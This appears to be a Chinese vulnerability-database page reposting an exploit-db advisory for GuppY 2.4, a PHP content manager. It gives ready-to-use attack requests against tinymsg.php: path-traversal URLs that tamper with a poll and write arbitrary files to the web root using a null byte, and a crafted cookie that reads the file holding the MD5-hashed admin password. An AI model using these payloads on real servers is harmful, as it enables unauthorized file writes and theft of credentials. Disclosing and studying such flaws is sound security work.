GuppY 2.4 – Remote File Access

GuppY 2.4 – Remote File Access

漏洞ID 1054214 漏洞类型
发布时间 2003-10-05 更新时间 2003-10-05
图片[1]-GuppY 2.4 – Remote File Access-安全小百科CVE编号 N/A
图片[2]-GuppY 2.4 – Remote File Access-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23220
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8769/info

GuppY is prone to an issue that could allow a remote attacker to read or write to files on the vulnerable server.

This issue presents itself in the tinymsg.php component of the software. The attacker could only access files to which the webserver has access. 

- http://[target]/tinymsg.php?action=2&from=Youpi!||Great
!||rose||10000&msg=1&to=../poll
will add a possibility to the current poll : "Youpi!" with the pink color
("rose" in french) and a score of 10000.

- http://[target]//tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2
will write into http://[target]/tadaam.html the line :
0nyoupi1||[DATE+HEURE]||youpi2

- The cookie named "GuppYUser" and with the value :
fr||../../admin/mdp.php%00||[MAIL]||LR||||on||1
sent to the page : http://[target]/tinymsg.php?action=3 will show the
source of the file http://[target]/admin/mdp.php (containing the md5-crypted
admin password).

相关推荐: 3Com SuperStack II RAS 1500 – Unauthorized Access

3Com SuperStack II RAS 1500 – Unauthorized Access 漏洞ID 1053784 漏洞类型 发布时间 2003-03-24 更新时间 2003-03-24 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Ha…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享